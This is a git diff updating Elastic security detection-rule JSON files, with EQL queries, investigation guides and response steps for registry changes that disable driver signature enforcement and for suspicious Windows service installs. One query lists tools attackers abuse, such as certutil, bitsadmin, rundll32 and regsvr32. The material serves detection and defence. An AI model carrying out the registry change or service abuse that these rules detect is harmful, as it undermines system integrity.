b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json index 0ed4b12b4b6..664bd4f07c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_7.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_7.json new file mode 100644 index 00000000000..07b62df1edc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_7.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Registry", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json index 96f40a6e941..e9c9ab13d87 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json +++ b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Machine Learning Detected a DNS Request With a High DGA Probability Score", "note": "", - "query": "ml_is_dga.malicious_probability \u003e 0.98\n", + "query": "ml_is_dga.malicious_probability > 0.98\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", "https://docs.elastic.co/en/integrations/dga" @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json index 36f33b2c05f..8e3ef2a10b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json +++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "da87eee1-129c-4661-a7aa-57d0b9645fad", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json index 6518b0f3d14..00f6e82d3dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json +++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "da87eee1-129c-4661-a7aa-57d0b9645fad", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json index 04240f1ab14..235a3a82179 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json +++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json index 096425967fd..43fbdd56f5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json +++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell 